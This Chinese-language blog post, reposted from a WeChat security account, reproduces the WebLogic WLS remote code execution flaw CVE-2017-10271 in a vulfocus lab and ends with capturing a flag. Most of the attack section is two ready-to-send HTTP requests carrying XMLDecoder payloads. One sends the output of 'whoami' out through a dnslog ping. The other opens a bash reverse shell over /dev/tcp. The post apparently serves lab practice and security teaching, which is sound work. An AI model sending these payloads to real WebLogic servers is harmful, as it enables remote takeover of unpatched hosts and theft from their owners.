【漏洞复现】Weblogic远程代码执行漏洞(CVE-2017-10271)

admin
admin
admin
137435
文章
113
评论
2023年2月16日19:37:15评论56 views字数 2754阅读9分10秒阅读模式

漏洞简介

事项
 描述
漏洞概述 WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击
响范围

10.3.6.0.0

12.1.3.0.0

12.2.1.1.0

12.2.1.2.0
洞编号 CVE-2017-10271



漏洞搭建

这里使用vulfocus进行复现。

【漏洞复现】Weblogic远程代码执行漏洞(CVE-2017-10271)



漏洞复现

访问http://192.168.146.167:35113/wls-wsat/CoordinatorPortType,发现访问成功,说明存在漏洞。

【漏洞复现】Weblogic远程代码执行漏洞(CVE-2017-10271)

抓包,修改恶意payload

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.146.167:35113
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=zjJnjkFGT6c7wV1ymhhcbJKzzNJL2s22NKZL0tbRZzJL51Cc2By1!-1925820320; ADMINCONSOLESESSION=k3GKjkbQ11p0nJs2GXsr1b2KXNtxCJ2ntJbLJ7HxnmKF1J3YnTJX!-971490304
Upgrade-Insecure-Requests: 1
Content-Type: text/xml[修改的]
Content-Length: 611

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>ping `whoami`.o9lng5.dnslog.cn</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

【漏洞复现】Weblogic远程代码执行漏洞(CVE-2017-10271)

在dnslog查看是否成功执行whoami命令,发现成功执行whoami

【漏洞复现】Weblogic远程代码执行漏洞(CVE-2017-10271)

既然可以执行命令,可以尝试反弹shell。需要注意的是,反弹shell的&需要进行编码转换。

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.146.167:35113
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=zjJnjkFGT6c7wV1ymhhcbJKzzNJL2s22NKZL0tbRZzJL51Cc2By1!-1925820320; ADMINCONSOLESESSION=k3GKjkbQ11p0nJs2GXsr1b2KXNtxCJ2ntJbLJ7HxnmKF1J3YnTJX!-971490304
Upgrade-Insecure-Requests: 1
Content-Type: text/xml[修改的]
Content-Length: 634

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i >&amp; /dev/tcp/192.168.146.167/9999 0>&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

【漏洞复现】Weblogic远程代码执行漏洞(CVE-2017-10271)

反弹shell成功。

【漏洞复现】Weblogic远程代码执行漏洞(CVE-2017-10271)

查找flag位置。

【漏洞复现】Weblogic远程代码执行漏洞(CVE-2017-10271)

过关。

【漏洞复现】Weblogic远程代码执行漏洞(CVE-2017-10271)



- End -


原文始发于微信公众号(NS Demon团队):【漏洞复现】Weblogic远程代码执行漏洞(CVE-2017-10271)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年2月16日19:37:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】Weblogic远程代码执行漏洞(CVE-2017-10271)http://cn-sec.com/archives/1555349.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息